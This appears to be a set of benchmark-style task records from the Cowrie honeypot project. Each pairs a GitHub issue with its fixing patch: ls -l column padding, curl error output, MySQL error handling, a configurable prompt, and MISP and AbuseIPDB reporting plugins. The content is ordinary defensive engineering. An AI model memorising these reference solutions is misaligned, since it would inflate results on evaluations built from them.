diff --git a/src/cowrie/commands/ls.py b/src/cowrie/commands/ls.py --- a/src/cowrie/commands/ls.py +++ b/src/cowrie/commands/ls.py @@ -112,9 +112,17 @@ def do_ls_normal(self, path): def do_ls_l(self, path): files = self.get_dir_files(path) - largest = 0 + filesize_str_extent = 0 if len(files): - largest = max([x[fs.A_SIZE] for x in files]) + filesize_str_extent = max([len(str(x[fs.A_SIZE])) for x in files]) + + user_name_str_extent = 0 + if len(files): + user_name_str_extent = max([len(self.uid2name(x[fs.A_UID])) for x in files]) + + group_name_str_extent = 0 + if len(files): + group_name_str_extent = max([len(self.gid2name(x[fs.A_GID])) for x in files]) for file in files: if file[fs.A_NAME].startswith('.') and not self.showHidden: @@ -167,9 +175,9 @@ def do_ls_l(self, path): line = '%s 1 %s %s %s %s %s%s' % \ (perms, - self.uid2name(file[fs.A_UID]), - self.gid2name(file[fs.A_GID]), - str(file[fs.A_SIZE]).rjust(len(str(largest))), + self.uid2name(file[fs.A_UID]).ljust(user_name_str_extent), + self.gid2name(file[fs.A_GID]).ljust(group_name_str_extent), + str(file[fs.A_SIZE]).rjust(filesize_str_extent), time.strftime('%Y-%m-%d %H:%M', ctime), file[fs.A_NAME], linktarget)
`ls -l` user/group names need justification `ls -l` does not properly pad the user/group names **To Reproduce** Steps to reproduce the behaviour: 1. ssh into a cowrie instance 2. `ls -l` on a directory with more than one user/group 3. the user names and group names don't line up between files **Expected behaviour** Nice justified columns of user/group names
2019-10-24T05:05:53
cowrie/cowrie
1,244
cowrie__cowrie-1244
[ "1243" ]
17e5215fdfe67341912020f3907d43aa10a10a92
diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py --- a/src/cowrie/commands/curl.py +++ b/src/cowrie/commands/curl.py @@ -309,23 +309,22 @@ def success(self, data, outfile): shasum=shasum, destfile=self.safeoutfile) - # Link friendly name to hash - # os.symlink(shasum, self.safeoutfile) - - # FIXME: is this necessary? - # self.safeoutfile = hashPath - - # Update the honeyfs to point to downloaded file - self.fs.update_realfile(self.fs.getfile(outfile), hashPath) - self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid) + # Update the honeyfs to point to downloaded file if output is a file + if outfile: + self.fs.update_realfile(self.fs.getfile(outfile), hashPath) + self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid) + else: + with open(hashPath, 'rb') as f: + self.writeBytes(f.read()) self.exit() def error(self, error, url): + log.msg(error.printTraceback()) if hasattr(error, 'getErrorMessage'): # Exceptions - error = error.getErrorMessage() - self.write(error) + errormsg = error.getErrorMessage() + log.msg(errormsg) self.write('\n') self.protocol.logDispatch(eventid='cowrie.session.file_download.failed', format='Attempt to download file(s) from URL (%(url)s) failed',
`curl` prints errors to honeypot attacker **Describe the bug** When using the command 'curl canhazip.com' inside the honeypot, rather than working the shell instead throws a Python exception: ``` 'NoneType' object has no attribute 'strip' ``` **To Reproduce** Steps to reproduce the behavior: 1. Use Cowrie 1.5.2, 1.9.7, or v2.0.0 2. Connect using an account/password which provides an emulated shell 3. enter the command `curl canhazip.com` This output is produced: ``` root@server:~# curl curl: try 'curl --help' or 'curl --manual' for more information root@server:~# curl http://canhazip.com 'NoneType' object has no attribute 'strip' root@server:~# curl canhazip.com 'NoneType' object has no attribute 'strip' ``` **Expected behavior** I would expect that the public IP address of the honeypot be returned. **Server (please complete the following information):** - OS: - Python: [e.g. Python 3.6.6, output of python -V] **Additional context** Seems like the issue may be here: https://github.com/cowrie/cowrie/blob/bf422e424c683cffef883243ac50ff1afbcff51c/src/cowrie/commands/curl.py#L50
I added self.write commands around both usages of "strip" in that file and neither appears to be the culprit. Something in handling the URL perhaps? The problem is line 328 ``` self.write(error)``` This prints the error to the end user. This should obviously be fixed :) The actual `strip` error his here in shell/fs.py ``` 2019-10-30T15:37:59.094869Z [twisted.python.log#error] Traceback (most recent call last): 2019-10-30T15:37:59.095219Z [twisted.python.log#error] File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/tcp. py", line 327, in connectionLost 2019-10-30T15:37:59.095913Z [twisted.python.log#error] protocol.connectionLost(reason) 2019-10-30T15:37:59.096223Z [twisted.python.log#error] File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/web/client.py", line 229, in connectionLost 2019-10-30T15:37:59.098157Z [twisted.python.log#error] self.factory._disconnectedDeferred.callback(None) 2019-10-30T15:37:59.098555Z [twisted.python.log#error] File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 460, in callback 2019-10-30T15:37:59.099354Z [twisted.python.log#error] self._startRunCallbacks(result) 2019-10-30T15:37:59.099685Z [twisted.python.log#error] File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 568, in _startRunCallbacks 2019-10-30T15:37:59.099970Z [twisted.python.log#error] self._runCallbacks() 2019-10-30T15:37:59.100251Z [twisted.python.log#error] --- <exception caught here> --- 2019-10-30T15:37:59.100527Z [twisted.python.log#error] File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 654, in _runCallbacks 2019-10-30T15:37:59.100803Z [twisted.python.log#error] current.result = callback(current.result, *args, **kw) 2019-10-30T15:37:59.101076Z [twisted.python.log#error] File "/Users/michel/src/cowrie/src/cowrie/commands/curl.py", line 319, in success 2019-10-30T15:37:59.101516Z [twisted.python.log#error] self.fs.update_realfile(self.fs.getfile(outfile), hashPath) 2019-10-30T15:37:59.101808Z [twisted.python.log#error] File "/Users/michel/src/cowrie/src/cowrie/shell/fs.py", line 221, in getfile 2019-10-30T15:37:59.102701Z [twisted.python.log#error] pieces = path.strip('/').split('/') 2019-10-30T15:37:59.103045Z [twisted.python.log#error] builtins.AttributeError: 'NoneType' object has no attribute 'strip'```
2019-10-30T15:49:58
cowrie/cowrie
1,312
cowrie__cowrie-1312
[ "1311" ]
029507ba77ef7a81f896e1e68b288f2057b040f6
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -32,7 +32,7 @@ def _runInteraction(self, interaction, *args, **kw): return adbapi.ConnectionPool._runInteraction( self, interaction, *args, **kw) except MySQLdb.OperationalError as e: - if e[0] not in (2003, 2006, 2013): + if e.args[0] not in (2003, 2006, 2013): raise e log.msg("RCP: got error {0}, retrying operation".format(e)) conn = self.connections.get(self.threadID())
Erroneous handling of MySQL errors The MySQL plug-in (`src/cowrie/output/mysql.py`) has code like this: ```python except MySQLdb.OperationalError as e: if e[0] not in (2003, 2006, 2013): raise e ``` From there, this code has been inherited by another honeypot of mine. Yesterday I accidentally hit it by running the honeypot in a Docker container that didn't have access to the MySQL server and forgetting to disable the MySQL plug-in in the config file, so the exception occurred. Well, apparently, you can't access the error code like this (`e[0]`), or you get an error that you're trying to index something that is not index-able. The proper way to access the error code is by using `e.args[0]`. See, for instance, [this example](https://github.com/B-ROY/TESTGIT/blob/40221cf254c90d37d21afb981635740aebf11949/base/site-packages/django/db/backends/mysql/base.py#L126). Man, this bug must have been there since forever... At least since 2008, judging by the comments in that code, although the links there have died by bit rot and are no longer accessible. The error is [present in Kippo](https://github.com/desaster/kippo/blob/master/kippo/dblog/mysql.py), too. Maybe originally this is how MySQLdb returned the error code?
Could this be a Python2/3 thing?
2020-03-09T12:26:01
cowrie/cowrie
1,316
cowrie__cowrie-1316
[ "1309" ]
c3ba2cf6ef48f2b8a36ef437ea3ddd8c04959fbc
diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py --- a/src/cowrie/shell/honeypot.py +++ b/src/cowrie/shell/honeypot.py @@ -13,6 +13,7 @@ from twisted.python.compat import iterbytes from cowrie.shell import fs +from cowrie.core.config import CowrieConfig # From Python3.6 we get the new shlex version if sys.version_info.major >= 3 and sys.version_info.minor >= 6: @@ -296,21 +297,27 @@ def showPrompt(self): if not self.interactive: return - cwd = self.protocol.cwd - homelen = len(self.protocol.user.avatar.home) - if cwd == self.protocol.user.avatar.home: - cwd = '~' - elif len(cwd) > (homelen + 1) and \ - cwd[:(homelen + 1)] == self.protocol.user.avatar.home + '/': - cwd = '~' + cwd[homelen:] - - # Example: [root@svr03 ~]# (More of a "CentOS" feel) - # Example: root@svr03:~# (More of a "Debian" feel) - prompt = '{0}@{1}:{2}'.format(self.protocol.user.username, self.protocol.hostname, cwd) - if not self.protocol.user.uid: - prompt += '# ' # "Root" user + prompt = '' + if CowrieConfig().has_option('honeypot','prompt'): + prompt = CowrieConfig().get('honeypot', 'prompt') + prompt += ' ' + else: - prompt += '$ ' # "Non-Root" user + cwd = self.protocol.cwd + homelen = len(self.protocol.user.avatar.home) + if cwd == self.protocol.user.avatar.home: + cwd = '~' + elif len(cwd) > (homelen + 1) and \ + cwd[:(homelen + 1)] == self.protocol.user.avatar.home + '/': + cwd = '~' + cwd[homelen:] + + # Example: [root@svr03 ~]# (More of a "CentOS" feel) + # Example: root@svr03:~# (More of a "Debian" feel) + prompt = '{0}@{1}:{2}'.format(self.protocol.user.username, self.protocol.hostname, cwd) + if not self.protocol.user.uid: + prompt += '# ' # "Root" user + else: + prompt += '$ ' # "Non-Root" user self.protocol.terminal.write(prompt.encode('ascii')) self.protocol.ps = (prompt.encode('ascii'), b'> ')
Update documentation on Cowrie with ELK Some information in the [official documentation regarding integration with ELK](https://cowrie.readthedocs.io/en/latest/elk/README.html) is obsolete/wrong. In `kibana.yml`: the following suggested line is not accepted by Kibana 7.6.0 and prevents it from running. `tilemap.url: https://tiles.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana` For **logstash**, it is no longer possible to get the GeoIP database directly from this link `wget http://geolite.maxmind.com/download/geoip/database/GeoLite2-City.mmdb.gz`: you must first register on [maxmind](https://www.maxmind.com), then get access to a download page and will get access to a GeoLite2.gzip file. This file must be unzipped to locate the mmdb file inside. For **filebeat**, the custom configuration file `filebeat-cowrie.conf` no longer works with filebeat 7.6.0: you no longer must specify a "prospector" but a `filebeat.inputs`: ``` filebeat.inputs: - type: log enabled: true paths: - /home/xxx/cowrie/var/log/cowrie/cowrie.json* encoding: plain ```
Other bug: in `./docs/elk/logstash-cowrie.conf`, the line `if [type] == "cowrie"` is incorrect and should be `if [fields][document_type] == "cowrie"` (see https://discuss.elastic.co/t/solved-cant-get-logstash-to-catch-cowrie-filebeat/165866/3). >and should be if [fields][document_type] == "cowrie" No, it shouldn't. `document_type` is deprecated in 6.x and removed in 7.x It would be nice you can make up to date configs for 6.8.x and 7.x, since there are a lot of breaking changes between 6.x and 7.x. So it might take a lot of time & effort to move to 7.x if somebody already have indexes with cowrie's data. > No, it shouldn't. document_type is deprecated in 6.x and removed in 7.x @fe7ch well, what is certain is that `if [type] == "cowrie"` is incorrect for 7.6.0 and causes logstash to refuse to spawn. Using `if [fields][document_type] == "cowrie"` fixed the issue, although I am not able to say if it is the right way to do it. @fe7ch you are right `[fields][document_type]` is probably incorrect. Actually, `[type]` is too, in the logs, I see the following message indicating that even `type` is obsolete in 7.6.0... ``` Mar 09 11:12:24 instance-39 logstash[12416]: [2020-03-09T11:12:24,830][WARN ][logstash.outputs.elasticsearch][main] Detected a 6.x and above cluster: the `type` event field won't be used to determine the document _type {:es_version=>7} ``` Trying to work out the correct configuration for 7.6.0...
2020-03-23T10:58:58
cowrie/cowrie
1,317
cowrie__cowrie-1317
[ "1306" ]
c3ba2cf6ef48f2b8a36ef437ea3ddd8c04959fbc
diff --git a/src/cowrie/output/misp.py b/src/cowrie/output/misp.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/misp.py @@ -0,0 +1,134 @@ +import sys +import warnings +from functools import wraps +from pathlib import Path + +from pymisp import MISPAttribute, MISPEvent, MISPSighting + +from twisted.python import log + +import cowrie.core.output +from cowrie.core.config import CowrieConfig + +try: + from pymisp import ExpandedPyMISP as PyMISP +except ImportError: + from pymisp import PyMISP as PyMISP + + +# PyMISP is very verbose regarding Python 2 deprecation +def ignore_warnings(f): + @wraps(f) + def inner(*args, **kwargs): + with warnings.catch_warnings(record=True): + warnings.simplefilter("ignore") + response = f(*args, **kwargs) + return response + return inner + + +class Output(cowrie.core.output.Output): + """ + MISP Upload Plugin for Cowrie. + + This Plugin creates a new event for unseen file uploads + or adds sightings for previously seen files. + The decision is done by searching for the SHA 256 sum in all matching attributes. + """ + + @ignore_warnings + def start(self): + """ + Start output plugin + """ + misp_url = CowrieConfig().get('output_misp', 'base_url') + misp_key = CowrieConfig().get('output_misp', 'api_key') + misp_verifycert = ("true" == CowrieConfig().get('output_misp', 'verify_cert').lower()) + self.misp_api = PyMISP(url=misp_url, key=misp_key, ssl=misp_verifycert, debug=False) + self.is_python2 = sys.version_info[0] < 3 + self.debug = CowrieConfig().getboolean('output_misp', 'debug', fallback=False) + self.publish = CowrieConfig().getboolean('output_misp', 'publish_event', fallback=False) + + def stop(self): + """ + Stop output plugin + """ + pass + + def write(self, entry): + """ + Push file download to MISP + """ + if entry['eventid'] == 'cowrie.session.file_download': + file_sha_attrib = self.find_attribute("sha256", entry["shasum"]) + if file_sha_attrib: + # file is known, add sighting! + if self.debug: + log.msg("File known, add sighting") + self.add_sighting(entry, file_sha_attrib) + else: + # file is unknown, new event with upload + if self.debug: + log.msg("File unknwon, add new event") + self.create_new_event(entry) + + @ignore_warnings + def find_attribute(self, attribute_type, searchterm): + """ + Returns a matching attribute or None if nothing was found. + """ + result = self.misp_api.search( + controller="attributes", + type_attribute=attribute_type, + value=searchterm + ) + + # legacy PyMISP returns the Attribute wrapped in a response + if self.is_python2: + result = result["response"] + + if result["Attribute"]: + return result["Attribute"][0] + else: + return None + + @ignore_warnings + def create_new_event(self, entry): + if self.is_python2: + self.misp_api.upload_sample( + entry["shasum"], + entry["outfile"], + None, + distribution=1, + info="File uploaded to Cowrie ({})".format(entry["sensor"]), + analysis=0, + threat_level_id=2 + ) + else: + attribute = MISPAttribute() + attribute.type = "malware-sample" + attribute.value = entry["shasum"] + attribute.data = Path(entry["outfile"]) + attribute.comment = "File uploaded to Cowrie ({})".format(entry["sensor"]) + attribute.expand = "binary" + event = MISPEvent() + event.info = "File uploaded to Cowrie ({})".format(entry["sensor"]) + event.attributes = [attribute] + event.run_expansions() + if self.publish: + event.publish() + result = self.misp_api.add_event(event) + if self.debug: + log.msg("Event creation result: \n%s" % result) + + @ignore_warnings + def add_sighting(self, entry, attribute): + if self.is_python2: + self.misp_api.sighting( + uuid=attribute["uuid"], + source="{} (Cowrie)".format(entry["sensor"]) + ) + else: + sighting = MISPSighting() + sighting.source = "{} (Cowrie)".format(entry["sensor"]) + self.misp_api.add_sighting(sighting, attribute)
Upload payloads to MISP **Is your feature request related to a problem? Please describe.** I'm running multiple instances of cowrie and always looked for a way to autmate some tasks revolving around automated first triage as well as having all collected payloads readily available and stored safely. MISP meets these requirements, so I have been tinkering around with an output plugin to upload encountered payloads to a MISP instance. **Describe the solution you'd like** The idea is to check the SHA256 hash of an encountered payload. If it is unknown to the MISP instance, a new case is created and the payload is uploaded as a *malware-sample*. If the SHA256 already exists, a sighting is added to the existing MISP case, therefore generating insights into the distribution timeline of a payload. **Describe alternatives you've considered** I have considered using other solutions like rsync tasks to copy payloads to a directory that is shared between all honeypots, but the combination of the MISP sightings graph, the search function and the grade of automation available through the WebUI are hard to beat. That said, I'm always open for discussion and feedback if there is a better way to do this. **Additional context** If there is interest from your side, I already have a running fork of cowrie with the added MISP output plugin, so I can open a Pull Request :) An example of how the output of this integration looks like can be seen in the attached screenshot. Please note the graph in the main *activity* as well as in the *sha256* row at the bottom. A detail view of the graph can be found in the second screenshot. ![grafik](https://user-images.githubusercontent.com/8026915/75327653-11bd5b00-587d-11ea-8da6-b22be8886a1d.png) ![grafik](https://user-images.githubusercontent.com/8026915/75328070-ac1d9e80-587d-11ea-9bc8-3f501b0f5629.png)
2020-03-23T14:55:21
cowrie/cowrie
1,346
cowrie__cowrie-1346
[ "1271" ]
0af58f906d98d328219d50804f494248003e9105
diff --git a/src/cowrie/output/abuseipdb.py b/src/cowrie/output/abuseipdb.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/abuseipdb.py @@ -0,0 +1,487 @@ +# MIT License # +# # +# Copyright (c) 2020 Benjamin Stephens <[email protected]> # +# # +# Permission is hereby granted, free of charge, to any person obtaining a # +# copy of this software and associated documentation files (the "Software"), # +# to deal in the Software without restriction, including without limitation # +# the rights to use, copy, modify, merge, publish, distribute, sublicense, # +# and/or sell copies of the Software, and to permit persons to whom the # +# Software is furnished to do so, subject to the following conditions: # +# # +# The above copyright notice and this permission notice shall be included in # +# all copies or substantial portions of the Software. # +# # +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # +# DEALINGS IN THE SOFTWARE. # + + +""" Cowrie plugin for reporting login attempts via the AbuseIPDB API. + +"AbuseIPDB is a project dedicated to helping combat the spread of hackers, +spammers, and abusive activity on the internet." <https://www.abuseipdb.com/> +""" + + +__author__ = 'Benjamin Stephens' +__version__ = '0.3b3' + + +import pickle +from collections import deque +from datetime import datetime +from json.decoder import JSONDecodeError +from pathlib import Path +from sys import version_info +from time import sleep, time + +from treq import post + +from twisted.internet import defer, reactor, threads +from twisted.python import log +from twisted.web import http + +from cowrie.core import output +from cowrie.core.config import CowrieConfig + + +# How often we clean and dump and our lists/dict... +CLEAN_DUMP_SCHED = 600 +# ...and the file we dump to. +DUMP_FILE = 'aipdb.dump' + +ABUSEIP_URL = 'https://api.abuseipdb.com/api/v2/report' +# AbuseIPDB will just 429 us if we report an IP too often; currently 15 minutes +# (900 seconds); set lower limit here to protect againt bad user input. +REREPORT_MINIMUM = 900 + + +class Output(output.Output): + def start(self): + self.tolerance_attempts = CowrieConfig().getint('output_abuseipdb', 'tolerance_attempts', fallback=10) + self.state_path = CowrieConfig().get('output_abuseipdb', 'dump_path') + self.state_path = Path(*(d for d in self.state_path.split('/'))) + self.state_dump = self.state_path / DUMP_FILE + + if version_info.minor < 6: + # PathLike object not compatible with with open in python < 3.6 + self.state_dump = str(self.state_dump) + + self.logbook = LogBook(self.tolerance_attempts, self.state_dump) + # Pass our instance of LogBook() to Reporter() so we don't end up + # working with different records. + self.reporter = Reporter(self.logbook, self.tolerance_attempts) + + # We store the LogBook state any time a shutdown occurs. The rest of + # our start-up is just for loading and cleaning the previous state + try: + with open(self.state_dump, 'rb') as f: + self.logbook.update(pickle.load(f)) + + # Check to see if we're still asleep after receiving a Retry-After + # header in a previous response + if self.logbook['sleeping']: + t_wake = self.logbook['sleep_until'] + t_now = time() + if t_wake > t_now: + # If we're meant to be asleep, we'll set logbook.sleep to + # true and logbook.sleep_until to the time we can wake-up + self.logbook.sleeping = True + self.logbook.sleep_until = t_wake + # and we set an alarm so the reactor knows when he can drag + # us back out of bed + reactor.callLater(t_wake - t_now, self.logbook.wakeup) + + del self.logbook['sleeping'] + del self.logbook['sleep_until'] + tolerated = self.logbook.pop('tolerated') + + except (pickle.UnpicklingError, FileNotFoundError, KeyError): + if self.state_path.exists(): + pass + else: + # If we don't already have an abuseipdb directory, let's make + # one with the necessary permissions now. + Path(self.state_path).mkdir(mode=0o700, parents=False, exist_ok=False) + + # And we do a clean-up to make sure that we're not carrying any expired + # entries. The clean-up task ends by calling itself in a callLater, + # thus running every CLEAN_DUMP_SCHED seconds until the end of time. + self.logbook.cleanup_and_dump_state() + + # If tolerance_attempts > the previous setting, we need to change the + # maximum length of the deque for any previously seen IP that we're + # loading, otherwise we'd potentially have IPs that may never trigger + # a report + try: + if tolerated != self.tolerance_attempts: + for k in self.logbook: + if self.logbook[k].__class__() == deque(): + self.logbook[k] = deque([*self.logbook[k]], maxlen=self.tolerance_attempts) + except UnboundLocalError: + pass + + log.msg( + eventid='cowrie.abuseipdb.started', + format='AbuseIPDB Plugin version {} started. Currently in beta.'.format(__version__), + ) + + def stop(self): + self.logbook.cleanup_and_dump_state(mode=1) + + def write(self, ev): + if self.logbook.sleeping: + return + + if ev['eventid'].rsplit('.', 1)[0] == 'cowrie.login': + # If tolerance_attempts was set to 1 or 0, we don't need to + # keep logs so our handling of the event is different than if > 1 + if self.tolerance_attempts <= 1: + self.intolerant_observer(ev['src_ip'], time(), ev['username']) + else: + self.tolerant_observer(ev['src_ip'], time()) + + def intolerant_observer(self, ip, t, uname): + # Checks if already reported; if yes, checks if we can rereport yet. + # The entry for a reported IP is a tuple (None, time_reported). If IP + # is not already in logbook, reports it immediately + if ip in self.logbook: + if self.logbook.can_rereport(ip, t): + self.reporter.report_ip_single(ip, t, uname) + else: + return + else: + self.reporter.report_ip_single(ip, t, uname) + + def tolerant_observer(self, ip, t): + # Appends the time an IP was seen to it's list in logbook. Once the + # length of the list equals tolerance_attempts, the IP is reported. + if ip in self.logbook: + try: + if self.logbook[ip][0]: + # Evaluates true if IP not already reported. If reported, + # logbook entry is of the form (None, time_reported). + self.logbook[ip].append(t) + self.logbook.clean_expired_timestamps(ip, t) + + if len(self.logbook[ip]) >= self.tolerance_attempts: + self.reporter.report_ip_multiple(ip) + + elif self.logbook.can_rereport(ip, t): + # Check if reported IP is ready for re-reporting + self.logbook[ip] = deque([t], maxlen=self.tolerance_attempts) + + else: + return + + except IndexError: + # If IP address was in logbook but had no entries then we're + # fine to re-report. + self.logbook[ip].append(t) + + else: + self.logbook[ip] = deque([t], maxlen=self.tolerance_attempts) + + +class LogBook(dict): + """ Dictionary class with methods for cleaning and dumping its state. + + This class should be treated as global state. For the moment this is + achieved simply by passing the instance created by Output() directly to + Reporter(). Sharing is caring. + """ + def __init__(self, tolerance_attempts, state_dump): + self.sleeping = False + self.sleep_until = 0 + self.tolerance_attempts = tolerance_attempts + self.tolerance_window = 60 * CowrieConfig().getint('output_abuseipdb', 'tolerance_window', fallback=120) + self.rereport_after = 3600 * CowrieConfig().getfloat('output_abuseipdb', 'rereport_after', fallback=24) + if self.rereport_after < REREPORT_MINIMUM: + self.rereport_after = REREPORT_MINIMUM + self.state_dump = state_dump + # To write our dump to disk we have a method we call in a thread so we + # don't block if we get slow io. This is a cheap hack to get a lock on + # the file. See self.write_dump_file() + self._writing = False + super().__init__() + + def wakeup(self): + # This is the method we pass in a callLater() before we go to sleep. + self.sleeping = False + self.sleep_until = 0 + self.recall = reactor.callLater(CLEAN_DUMP_SCHED, self.cleanup_and_dump_state) + log.msg( + eventid='cowrie.abuseipdb.wakeup', + format='AbuseIPDB plugin resuming activity after receiving ' + 'Retry-After header in previous response.', + ) + + def clean_expired_timestamps(self, ip_key, current_time): + # Performs popleft() if leftmost timestamp has expired. Continues doing + # so until either; 1) a timestamp within our reporting window is + # reached, or; 2) the list is empty. + while self[ip_key]: + if not self[ip_key][0]: + break + elif self[ip_key][0] < current_time - self.tolerance_window: + self[ip_key].popleft() + else: + break + + def find_and_delete_empty_entries(self): + # Search and destroy method. Iterates over dict, appends k to delete_me + # where v is an empty list. + delete_me = [] + for k in self: + if not self[k]: + delete_me.append(k) + self.delete_entries(delete_me) + + def delete_entries(self, delete_me): + for i in delete_me: + del self[i] + + def can_rereport(self, ip_key, current_time): + # Checks if an IP in the logbook that has already been reported is + # ready to be re-reported again. + try: + if current_time > self[ip_key][1] + self.rereport_after: + return True + + elif self[ip_key][0] and self.tolerance_attempts <= 1: + # If we were previously running with a tolerance_attempts > 1 + # and have been been restarted with tolerance_attempts <= 1, + # we could still be carrying some logs which would evaluate as + # false in our first test. Reported IPs will still evaluate + # false here. + return True + + else: + return False + + except IndexError: + return True + + def cleanup_and_dump_state(self, mode=0): + # Runs a full clean-up of logbook. Re-calls itself in CLEAN_DUMP_SCHED + # seconds. MODES: 0) Normal looping task, and; 1) Sleep/Stop mode; + # cancels any scheduled callLater() and doesn't recall itself. + if mode == 1: + try: + self.recall.cancel() + except AttributeError: + pass + + if self.sleeping: + t = self.sleep_until + else: + t = time() + + delete_me = [] + for k in self: + if self.can_rereport(k, t): + delete_me.append(k) + self.clean_expired_timestamps(k, t) + self.delete_entries(delete_me) + + self.find_and_delete_empty_entries() + + self.dump_state() + + if mode == 0 and not self.sleeping: + self.recall = reactor.callLater(CLEAN_DUMP_SCHED, self.cleanup_and_dump_state) + + def dump_state(self): + dump = { + 'sleeping': self.sleeping, + 'sleep_until': self.sleep_until, + # Store current self_tolerance for comparison on next start + 'tolerated': self.tolerance_attempts, + } + + for k, v in self.items(): + dump[k] = v + + reactor.callInThread(self.write_dump_file, dump) + + def write_dump_file(self, dump): + # Check self._writing; waits for release; timeout after 10 seconds. + i = 0 + while self._writing: + sleep(1) + i += 1 + if i >= 10: + return + + # Acquire 'lock' + self._writing = True + + with open(self.state_dump, 'wb') as f: + pickle.dump(dump, f, protocol=pickle.HIGHEST_PROTOCOL) + + # Release 'lock' + self._writing = False + + +class Reporter: + """ HTTP client and methods for preparing report paramaters. + """ + def __init__(self, logbook, attempts): + self.logbook = logbook + self.attempts = attempts + self.headers = { + 'User-Agent': 'Cowrie Honeypot AbuseIPDB plugin', + 'Accept': 'application/json', + 'Key': CowrieConfig().get('output_abuseipdb', 'api_key') + } + + def report_ip_single(self, ip, t, uname): + self.logbook[ip] = (None, t) + + t = self.epoch_to_string_utc(t) + + params = { + 'ip': ip, + 'categories': '18,22', + 'comment': 'Cowrie Honeypot: Unauthorised SSH/Telnet login attempt ' + 'with user "{}" at {}'.format(uname, t) + } + + self.http_request(params) + + def report_ip_multiple(self, ip): + t_last = self.logbook[ip].pop() + t_first = self.epoch_to_string_utc(self.logbook[ip].popleft()) + + self.logbook[ip] = (None, t_last) + + t_last = self.epoch_to_string_utc(t_last) + + params = { + 'ip': ip, + 'categories': '18,22', + 'comment': 'Cowrie Honeypot: {} unauthorised SSH/Telnet login attempts ' + 'between {} and {}'.format(self.attempts, t_first, t_last) + } + + self.http_request(params) + + @staticmethod + def epoch_to_string_utc(t): + t_utc = datetime.utcfromtimestamp(t) + return t_utc.strftime('%Y-%m-%dT%H:%M:%SZ') + + @staticmethod + def log_response_failed(ip, response, reason): + log.msg( + eventid='cowrie.abuseipdb.reportfail', + format='AbuseIPDB plugin failed to report IP %(IP)s. Received HTTP ' + 'status code %(response)s in response. Reason: %(reason)s.', + IP=ip, + response=response, + reason=reason, + ) + + @defer.inlineCallbacks + def http_request(self, params): + try: + response = yield post( + url=ABUSEIP_URL, + headers=self.headers, + params=params, + ) + + except Exception as e: + log.msg( + eventid='cowrie.abuseipdb.reportfail', + format='AbuseIPDB plugin failed to report IP %(IP)s. ' + 'Exception raised: %(exception)s.', + IP=params['ip'], + exception=repr(e), + ) + return + + if response.code != http.OK: + if response.code == 429: + return self.rate_limit_handler(params, response) + + try: + reason = http.RESPONSES[response.code].decode('utf-8') + except Exception: + reason = 'Unable to determine.' + + self.log_response_failed(params['ip'], response.code, reason) + + return + + j = yield response.json() + + log.msg( + eventid='cowrie.abuseipdb.reportedip', + format='AbuseIPDB plugin successfully reported %(IP)s. Current ' + 'AbuseIPDB confidence score for this IP is %(confidence)s', + IP=params['ip'], + confidence=j['data']['abuseConfidenceScore'] + ) + + @defer.inlineCallbacks + def rate_limit_handler(self, params, response): + try: + j = yield response.json() + reason = j['errors'][0]['detail'] + + except (KeyError, JSONDecodeError): + reason = 'No other information provided or unexpected response' + + self.log_response_failed(params['ip'], response.code, reason) + + # AbuseIPDB will respond with a 429 and a Retry-After in its response + # headers if we've exceeded our limits for the day. Here we test for + # that header and, if it exists, put ourselves to sleep. + retry_after = yield response.headers.hasHeader('Retry-After') + + if retry_after: + retry = yield response.headers.getRawHeaders('Retry-After') + retry = int(retry.pop()) + + if retry > 86340: + yield threads.deferToThread(self.sleeper_thread) + + log.msg( + eventid='cowrie.abuseipdb.ratelimited', + format='AbuseIPDB plugin received Retry-After header > 86340 ' + 'seconds in previous response. Possible delayed quota ' + 'reset on AbuseIPDB servers; retrying request now.', + ) + + return self.http_request(params) + + self.logbook.sleeping = True + self.logbook.sleep_until = time() + retry + reactor.callLater(retry, self.logbook.wakeup) + # It's not serious if we don't, but it's best to call the clean-up + # after logbook.sleeping has been set to True. The clean-up method + # checks for this flag and will use the wake-up time rather than + # the current time when sleep is set. mode=1 ensures we'll cancel + # any already scheduled calls to clean-up and don't schedule + # another one until the wake-up method calls it again. + self.logbook.cleanup_and_dump_state(mode=1) + + self.epoch_to_string_utc(self.logbook.sleep_until) + log.msg( + eventid='cowrie.abuseipdb.ratelimited', + format='AbuseIPDB plugin received Retry-After header in ' + 'response. Reporting activity will resume in ' + '%(retry_after)s seconds at %(wake_at)s', + retry_after=retry, + wake_at=self.epoch_to_string_utc(self.logbook.sleep_until) + ) + + def sleeper_thread(self): + # Cheap retry wait hack. Call in thread so as not to block. + sleep(10)
Add output plugin: AbuseIP Database Similar to SANS DShield and CSIRTG, AbuseIP also offers a public list of bad actors, with ability to export feeds to FAIL2BAN. API documentation at https://docs.abuseipdb.com/
